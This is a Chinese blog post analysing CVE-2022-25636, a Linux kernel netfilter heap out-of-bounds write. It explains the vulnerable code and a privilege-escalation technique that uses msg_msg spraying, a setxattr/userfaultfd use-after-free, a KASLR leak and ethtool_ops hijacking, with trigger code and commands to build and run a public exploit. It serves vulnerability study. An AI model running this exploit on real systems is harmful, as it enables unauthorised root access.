[漏洞分析] CVE-2022-25636 netfilter内核提权

最新推荐文章于 2024-09-22 15:32:07 发布
最新推荐文章于 2024-09-22 15:32:07 发布
阅读量1.2w 收藏 2
点赞数 2
分类专栏: 漏洞分析 二进制 # linux kernel 文章标签: 网络安全 CVE 漏洞利用 安全漏洞 linux内核
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/breeze_cat/article/details/123619913
版权
二进制 同时被 3 个专栏收录
56 篇文章 18 订阅
订阅专栏
linux kernel
27 篇文章 5 订阅
订阅专栏
漏洞分析
17 篇文章 11 订阅
订阅专栏

CVE-2022-25636 netfilter内核提权

文章目录

漏洞简介

漏洞编号: CVE-2022-25636

漏洞产品: linux kernel - netfilter

影响版本: linux kernel 5.4 ~

漏洞危害: netfilter 内核模块中存在堆越界写,存在SYS_ADMIN时可以造成提权

环境搭建

漏洞存在于netfilter 内核模块中,漏洞所在代码在3个ko 中。

nft_dup_netdev.ko  
nf_dup_netdev.ko 
nf_tables.ko

直接qemu 启动有问题,ko 装载不上,使用vmware双机联调。

ubuntu 21.10 可以手动替换内核:

apt-get install linux-image-5.13.0-30-generic

然后删除原本的内核,编译exp :

git clone https://github.com/Bonfee/CVE-2022-25636.git
apt-get install libmnl-dev
apt-get install libfuse-dev
apt-get install libnftnl-dev
make
./exploit

提权效果(成功率不到5成):

在这里插入图片描述

漏洞原理

漏洞发生点

漏洞所在函数为nft_fwd_dup_netdev_offload:

linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload

int nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx,
			       struct nft_flow_rule *flow,
			       enum flow_action_id id, int oif)
{
	struct flow_action_entry *entry;
	struct net_device *dev;

	/* nft_flow_rule_destroy() releases the reference on this device. */
	dev = dev_get_by_index(ctx->net, oif);
	if (!dev)
		return -EOPNOTSUPP;

	entry = &flow->rule->action.entries[ctx->num_actions++];//越界
	entry->id = id;
	entry->dev = dev;

	return 0;
}
EXPORT_SYMBOL_GPL(nft_fwd_dup_netdev_offload);

在设置flow->rule->action.entries(该结构体为变长结构体没有)时没有堆边界进行检查,导致越界写一个整数(4或5)和一个指针。

调用栈

函数的使用在 nft_flow_rule_create 函数中 :

linux\net\netfilter\nf_tables_offload.c : 90 : nft_flow_rule_create

struct nft_flow_rule *nft_flow_rule_create(struct net *net,
					   const struct nft_rule *rule)
{
	struct nft_offload_ctx *ctx;
	struct nft_flow_rule *flow;
	int num_actions = 0, err;
	struct nft_expr *expr;

	expr = nft_expr_first(rule);
	while (nft_expr_more(rule, expr)) {//根据传入reule 的数量计算num_actions
		if (expr->ops->offload_flags & NFT_OFFLOAD_F_ACTION)
			num_actions++;// 只有带有NFT_OFFLOAD_F_ACTION 标记才计数

		expr = nft_expr_next(expr);
	}

	if (num_actions == 0)
		return ERR_PTR(-EOPNOTSUPP);

	flow = nft_flow_rule_alloc(num_actions);//根据num_actions 数量申请空间(变长结构体)
	if (!flow)
		return ERR_PTR(-ENOMEM);

	expr = nft_expr_first(rule);
	//ctx->num_actions 初始化为0 ↓
	ctx = kzalloc(sizeof(struct nft_offload_ctx), GFP_KERNEL);
	if (!ctx) {
		err = -ENOMEM;
		goto err_out;
	}
	ctx->net = net;
	ctx->dep.type = NFT_OFFLOAD_DEP_UNSPEC;

	while (nft_expr_more(rule, expr)) {
		if (!expr->ops->offload) {//根据rule数量调用offload
			err = -EOPNOTSUPP;
			goto err_out;
		}
		err = expr->ops->offload(ctx, flow, expr);//调用漏洞函数
		if (err < 0)
			goto err_out;

		expr = nft_expr_next(expr);
	}
	··· ···
    ··· ···
}

可以看到nft_flow_rule_create 函数根据用户空间传入的rule 结构数量来申请flow 结构体并进行处理。使用num_actions 变量来计数,但计数过程中只计算带有NFT_OFFLOAD_F_ACTION flag 标记的rule,并根据数量申请相应大小的结构体。后续调用offload 处理的时候,却没有使用num_actions 来进行循环。而是和之前一样进行rule 数量的次数的循环,但这里没有再进行flag的NFT_OFFLOAD_F_ACTION 判断。也就是说,当传入的rule 中有不带NFT_OFFLOAD_F_ACTION 标记的flag 的时候,后续调用offload 的次数是大于之前申请的flow->rule->action.entries 数量的,在offload 里会调用漏洞函数nft_fwd_dup_netdev_offload,每次调用ctx->num_actions 会加一,且ctx->num_actions 初始化为0,最后ctx->num_actions 会大于flow->rule->action.entries数组范围,造成越界。

一些结构体:

struct nft_flow_rule {
	__be16			proto;
	struct nft_flow_match	match;
	struct flow_rule	*rule;
};

struct flow_rule {
	struct flow_match	match;
	struct flow_action	action;
};

struct flow_action {
	unsigned int			num_entries;
	struct flow_action_entry	entries[];
};

struct flow_action_entry {
	enum flow_action_id		id;
	enum flow_action_hw_stats	hw_stats;
	action_destr			destructor;
	void				*destructor_priv;
	union {
		u32			chain_index;	/* FLOW_ACTION_GOTO */
		struct net_device	*dev;		/* FLOW_ACTION_REDIRECT */
		··· ···
	};
	struct flow_action_cookie *cookie; /* user defined action cookie */
};

struct nft_offload_ctx {
	struct {
		enum nft_offload_dep_type	type;
		__be16				l3num;
		u8				protonum;
	} dep;
	unsigned int				num_actions;
	struct net				*net;
	struct nft_offload_reg			regs[NFT_REG32_15 + 1];
};

调用栈:

  • nft_flow_rule_create
    • nft_dup_netdev_offload/nft_fwd_netdev_offload
      • nft_fwd_dup_netdev_offload

netfilter的使用以及触发

参考链接:https://www.openwall.com/lists/oss-security/2022/02/21/2

该邮件说明了如何用C语言的libmnl和libnftnl 库来使用netfilter,主要触发漏洞的点在于添加的rule是否存在NFT_OFFLOAD_F_ACTION flag 标记。只有nftnl_expr_alloc("immediate");添加的rule才有NFT_OFFLOAD_F_ACTION 标记:

for(int i = 0; i < legit_writes; i++) {//如下添加expr 不会越界
    exprs[exprid] = nftnl_expr_alloc("immediate");
    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DREG, NFT_REG_1);
    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_IMM_DATA, 1);
    nftnl_rule_add_expr(rule, exprs[exprid]);
    exprid++;
    exprs[exprid] = nftnl_expr_alloc("dup");
    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
    nftnl_rule_add_expr(rule, exprs[exprid]);
    exprid++;
}
//如下添加expr 会越界
for (int unaccounted_dup = 0; unaccounted_dup < oob_writes; unaccounted_dup++) {
    exprs[exprid] = nftnl_expr_alloc("dup");
    nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_DUP_SREG_DEV, NFT_REG_1);
    nftnl_rule_add_expr(rule, exprs[exprid]);
    exprid++;
}

漏洞利用

漏洞利用不是很稳定,但利用技术很精妙,漏洞是越界固定偏移的位置写一个不可控指针,个人认为利用难度非常高。简单分析一下技术手法把。根据漏洞的代码,可以知道,每次越界只能写一个整数(id,固定为4或5)和一个指针(*dev),其中指针指向struct net_device 结构体。我们这里只关注dev 指针写:

int nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx,
			       struct nft_flow_rule *flow,
			       enum flow_action_id id, int oif)
{
	··· ···
	entry = &flow->rule->action.entries[ctx->num_actions++];//越界
	entry->id = id;
	entry->dev = dev; //固定偏移写一个堆地址,dev 为struct net_device 结构体
	··· ···
}

关于struct flow_rule 结构体,由于是一个变长结构体,所以他能申请到的大小范围关乎到能否利用(成功)

  • 当只传入一个rule 的时候,该结构体大小为0x70,属于kmalloc-128(0x80) ,如果发生越界,则dev 指针会写到0x88 的位置,也就是越界0x8处
  • 如果传入两个rule,则结构体大小为0xC0,正好属于kmalloc-192(0xC0),如果发生越界,dev 指针会写到0xd8的位置,也就是越界0x18处,越界两次会在越界0x18 +0x50的地方…

相关结构体:

struct flow_rule {
	struct flow_match	match;
	struct flow_action	action;
};

struct flow_match {
	struct flow_dissector	*dissector;
	void			*mask;
	void			*key;
};

struct flow_dissector {
	unsigned int used_keys; /* each bit repesents presence of one key id */
	unsigned short int offset[FLOW_DISSECTOR_KEY_MAX];
};

struct flow_action {
	unsigned int			num_entries;
	struct flow_action_entry	entries[];
};

struct flow_action_entry {//大小0x50
	enum flow_action_id		id;
	enum flow_action_hw_stats	hw_stats;
	action_destr			destructor;
	void				*destructor_priv;
	union {
		u32			chain_index;	/* FLOW_ACTION_GOTO */
		struct net_device	*dev;		/* FLOW_ACTION_REDIRECT */
		··· ···
	};
	struct flow_action_cookie *cookie; /* user defined action cookie */
};

泄露内核net_device结构体地址

进入漏洞利用,首先要泄露两次*dev 的地址,由于要泄露两个不同的dev地址,所以一个在本进程泄露,一个在子进程泄露。使用msg_msg 来泄露(msg_msg技术回顾),堆喷大小为0x1040 的msg,这样由于msg 的结构,会分成两段,第二段msg 长度为0x70,加上头指针,会申请到kamalloc-128,然后释放一个msg,释放掉一个kmalloc-128。接下来使用只有一个rule 的flow_rule结构体,正好也是kmalloc-128,希望能申请到刚刚释放的msg 的第二段kmalloc-128组成如下的堆造型:

在这里插入图片描述

flow_rule申请到释放的msg_msgseg结构后,大概率挨着其他堆喷的msg_msgseg,这样发生一次越界写,会在越界0x8的位置写一个net_device堆指针(dev指针)。只需要把刚堆喷的消息全接收一遍,就可以读到这个堆指针,完成地址泄露,用于后续利用,并且不会崩溃。

setxattr来UAF泄露kaslr

接下来泄露kaslr,获得内核基址。用同样的方法,使用msg_msg+堆喷,堆喷一堆kmalloc-192 的msg,这回使用的是msg_msg 第一段作为堆喷目标。然后跟之前的方法相同,释放一个,然后申请flow_rule,争取构成如下堆造型:

在这里插入图片描述

这次使用的是带两个rule 的flow_rule 结构,大小为0xC0,正好属于kmalloc-192,如果越界写6次,会在越界0x18+0x50*5的地方写一个* dev指针,正好是下面第三个kmalloc-192 的偏移0x28 的地方,如果是msg_msg 结构体的话,就是security指针,这时如果使用msgrcv 函数释放这个msg_msg 结构体,他就会调用kfree,释放security指针指向的内容,这也是msg_msg->security的任意地址释放源语,相关代码如下:

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
	       long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{		
    ··· ···
    ··· ···
	free_msg(msg); 			
	··· ···
}

void free_msg(struct msg_msg *msg)
{
	··· ···
	security_msg_msg_free(msg);
	··· ···
}

void security_msg_msg_free(struct msg_msg *msg)
{
	call_void_hook(msg_msg_free_security, msg);
	kfree(msg->security);
	msg->security = NULL;
}

这样,对刚刚堆喷的消息进行接收操作,就会将我们覆盖securitydev 指针释放掉,也就是释放掉net_device 结构体。接下来使用setxattr+userfaulted来尝试对该堆块进行篡改,完成UAF。setxattr 可以申请任意大小的内核堆,并写入任意内容,然后释放。内核漏洞利用的常见手段。

由于现在kernel中 free状态的kmalloc-192 有很多,只是用一次setxattr肯定是不够的,所以采用多线程同时调用setxattr,并且利用userfaulted 增加调用时间,增加堆块占用时间,争取申请更多内核堆,进而申请到刚释放的net_device 结构体。申请到就可以修改net_device结构体的内容了,修改里面的dev_addr 指针为netdev_ops 指针,因为netdev_ops 会初始化为loopback_ops,然后改一些名字之类的用来判断是否修改成功:

    ((uint64_t*)(setxattr_bufs[i]))[2] = 0x6f6c; // dev->name = "lo"
    ((uint64_t*)(setxattr_bufs[i]))[104] = child_net_device_leak + 0xc8; // set dev_addr ptr
    ((uint64_t*)(setxattr_bufs[i]))[78] = 0x0808080800000000; // set addr_len to '0x08'
    ((uint64_t*)(setxattr_bufs[i]))[28] = 0x42424242; // ifindex

接下来只要调用socketioctlSIOCGIFHWADDR 功能 读取物理地址,就可以读取到loopback_ops 的地址完成泄露。net_device 一些有用的成员如下:

struct net_device {
	char			name[IFNAMSIZ]; //修改name判断是否改正确
	··· ···
	const struct net_device_ops *netdev_ops;//初始化为,用于泄露内核地址
	int			ifindex;   
	·· ···
	const struct  ethtool_ops *ethtool_ops; //用于劫持rip
	··· ···
	unsigned char		addr_len; //用于读取地址长度
	··· ···
	unsigned char		*dev_addr; //篡改用于泄露地址,被SIOCGIFHWADDR 读取
};

二次UAF完成内核rop

同样的办法使用setxattr+userfaulted完成UAF,这次我们有了内核地址之后,直接篡改net_deviceethtool_ops 劫持eip,之后使用socketiotlSIOCETHTOOL功能,就会调用ethtool_ops 中的函数劫持rip,然后ROP即可。在ubuntu21.10 内核版本13.0-30 复现成功:

exp:https://github.com/Bonfee/CVE-2022-25636

在这里插入图片描述

参考

邮件:https://www.openwall.com/lists/oss-security/2022/02/21/2

exp:https://github.com/Bonfee/CVE-2022-25636

breezeO_o
关注
专栏目录
Linux Kernel nf_tables 本地权限提升漏洞(CVE-2024-1086)
做自己喜欢的事,并将其发挥到极致!
06-06 8476
2024年1月,各Linux发行版官方发布漏洞公告,修复了一个 netfilter:nf_tables 模块中的释放后重用漏洞(CVE-2024-1086)。在nft_verdict_init()函数的错误处理导致nf_hook_slow()函数在NF_DROP的分支的时候以NF_ACCEPT返回,进而在NF_HOOK()函数产生释放后重用漏洞。鉴于该漏洞易于利用,并且允许本地攻击者提升至ROOT权限。​
【权限提升】Linux Kernel 权限提升漏洞 (CVE-2023-32233)
做自己喜欢的事,并将其发挥到极致!
05-23 2058
Linux Netfilter是一个在 Linux 内核中的网络数据包处理框架,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分。Linux内核的Netfilter子系统在处理批量请求更新nf_tables 配置信息时,由于处理匿名集的逻辑存在缺陷,存在释放重利用(UAF) 漏洞。利用该漏洞可对内核内存的任意读写,具有CAP_NET_ADMIN权限的本地用户可利用该漏洞提升至ROOT权限
【kernel exploit】CVE-2022-25636 nftables OOB 写堆指针漏洞利用
panhewu9919的博客
12-13 995
`nf_table` 模块的 `net/netfilter/nf_dup_netdev.c`中的 [nft_fwd_dup_netdev_offload()](https://elixir.bootlin.com/linux/v5.16.11/source/net/netfilter/nf_dup_netdev.c#L67) 函数由于计算分配空间与实际初始化时判断条件不一致,存在**OOB write**(系统必须支持包处理卸载-Network Interface Cards (NICs),但是现实中很少见
Netfilter漏洞提权利用(CVE-2023-35001)
蚁景网安学院
04-25 1145
Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(Network Address Translation,NAT)、数据包过滤等功能。
CVE-2022-25845 复现
最新发布
2201_75824562的博客
09-22 1707
在Fastjson1.2.25版本里面,Java引入了checkAutoType()检查,会对加载的类进行白名单和黑名单检查。autoTypeSupport默认为False,此时只会验证白名单当autoTypeSupport开启时,先白名单过滤,匹配成功即可加载该类,否则再黑名单过滤开启AutoType的情况下有很多相关的绕过方式,可以自行查阅这篇文章主要讲一下如何绕过AutoTyoe默认禁用策略——CVE-2022-25845绕过AutoTyoe默认禁用策略漏洞的核心在于:只要。
[漏洞分析] CVE-2022-32250 netfilter UAF内核提权
热门推荐
Breeze的博客
10-24 1万+
分析CVE-2022-32250 漏洞触发原理以及利用技巧
探索Bonfee的CVE-2022-25636:一个安全研究者的宝藏
gitblog_00089的博客
04-19 338
探索Bonfee的CVE-2022-25636:一个安全研究者的宝藏 去发现同类优质开源项目:https://gitcode.com/ 该项目[1]由开发者Bonfee创建,主要关注于CVE-2022-25636安全漏洞研究。CVE(Common Vulnerabilities and Exposures)是一种全球性的标准,用于识别和跟踪计算机系统中的特定安全弱点。此项目的目标是提供对这一特定...
Linux Netfilter 防火墙模块爆新漏洞,攻击者可获取root权限
smellycat000的专栏
03-15 414
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成...
linux内核UAF漏洞分析CVE-2018-17182
yiduoxiaoxx的博客
02-26 2179
1.漏洞原理分析 1.1 vma缓存机制 vma就是虚拟地址区域(virtual memory area),内核用vma来管理进程分配的虚拟内存地址。vma在内核中用结构体struct vm_ares_struct 表示,定义如下: struct vm_area_struct { unsigned long vm_start; // 起始虚拟地址 unsig...
红队攻防渗透技术实战流程:云安全之云原生安全:内核漏洞和版本漏洞
HACKONE的博客
05-21 635
常规检测:https://github.com/teamssix/container-escape-check。检测利用:https://github.com/cdk-team/CDK。-CVE-2020-15257 containerd逃逸。4、实验获取到docker搭建的Web权限后进行逃逸。#云原生-Docker安全-容器逃逸&CDK自动化。#云原生-Docker安全-容器逃逸&内核漏洞。#云原生-Docker安全-容器逃逸&版本漏洞。-CVE-2019-5736 runC容器逃逸。
所学漏洞总结
weixin_45540609的博客
08-31 924
一、CVE-2021-28474 MS SharePoint远程代码执行漏洞 1、漏洞简介 漏洞允许通过身份验证的用户在SharePoint web应用程序的服务账户中执行任意.NET代码。想要利用该漏洞,攻击者需要具备SharePoint站点的SPBasePermissions.ManageLists权限。默认情况下,经过身份验证的SharePoint用户可以创建网页页面,并拥有所需的所有权限。 2、漏洞成因 用于安全验证的代码和实际处理用户输入的代码之间不一致。 EditingPagePars
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XXE漏洞获取root私钥
Zyu0
12-02 1487
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XML外部实体(XXE)注入提权
iptables与nftables,ufw与firewalld以及netfilter详解
侯刚的博客
09-29 5654
iptables,nftables,ufw,firewalld以及netfilter详解,ufw与firewalld介绍,iptables,ufw以及firewalld与iptables的关系
nf_tables
喝醉酒的小白
06-22 2041
nf_tables是 Linux 内核中的一个组件,属于 netfilter 子系统的一部分。它的作用类似于iptables,都是用于配置和执行网络相关的规则,实现防火墙的功能。以下是nf_tablesnf_tables允许管理员定义和管理网络规则集,这些规则可以基于不同的标准(如源地址、目的地址、端口号等)来控制数据包的流动。nf_tables设计用于处理大量的网络规则,相比iptables,在规则数量较多时,它提供了更好的性能。nf_tables提供了比iptables。
【kernel exploit】CVE-2022-32250 nftables错误链表操作导致UAF写的漏洞利用
panhewu9919的博客
11-03 1605
`nftables` 模块的 `net/netfilter/nf_tables_api.c` 采用 `NFT_MSG_NEWSET` 功能来添加 `nft_set` 时,处理 `lookup` 和 `dynset` expression 时,由于错误的 `NFT_EXPR_STATEFUL` 检查,`nft_expr` 对象释放后仍位于`nft_set->binding` 链表中,新加入 `nft_expr` 时导致**UAF写**(触发漏洞需要 `CAP_NET_ADMIN` 权限)。UAF写会往 `km
CVE-2022-0185 价值$3w的 File System Context 内核整数溢出漏洞利用分析
panhewu9919的博客
04-11 1721
漏洞作者在kctf环境上成功完成了提权和逃逸,并获得了 google kCTF vulnerability reward program 项目奖励的 31,337 美金的奖励(该项目对能从有nsjail 沙箱的Linux内核提权,奖励31,337 到 91,337 美元,由于syzbot平台上有人比作者早6天先发现了这个漏洞,作者并非首次发现该漏洞,只是完成了kctf提权,便获得了最低奖金)。 影响版本:Linux-v5.1~v5.16.2。5.1-rc1 引入漏洞Linux-v5.16.2已修补 ,由
vulhub中spring的CVE-2022-22963漏洞复现
yougexiaojiuguan的博客
12-01 752
学习过程中的记录,方便以后查看
[sips]搭建opensip:ubuntu+ARM 64位
willis
10-13 1510
1.下载opensips 官网文档 下载openSips的各个版本 openSIPS | Documentation / Compile and Install - 3.1 在官网openSIPS | Main / HomePage能看到哪个是稳定版本,这里下载3.2.2版本 2.编译opensips
[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)
qq_51577576的博客
08-05 4860
​ Apache Shiro 是一个强大且易用的 Java 安全框架,通过它可以执行身份验证、授权、密码和会话管理。使用 Shiro 的易用 API,您可以快速、轻松地保护任何应用程序 —— 从最小的移动应用程序到最大的 WEB 和企业应用程序。...
分析CVE-2022-37969 Windows本地提权漏洞原理
最后,标签中提到的“windows 系统安全 系统漏洞 windows漏洞 CVE-2022-37969”不仅为本资源提供了核心主题,也指明了这一漏洞对Windows系统安全的重要性。安全社区成员和用户都应该对此类漏洞保持警惕,以便能够...
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值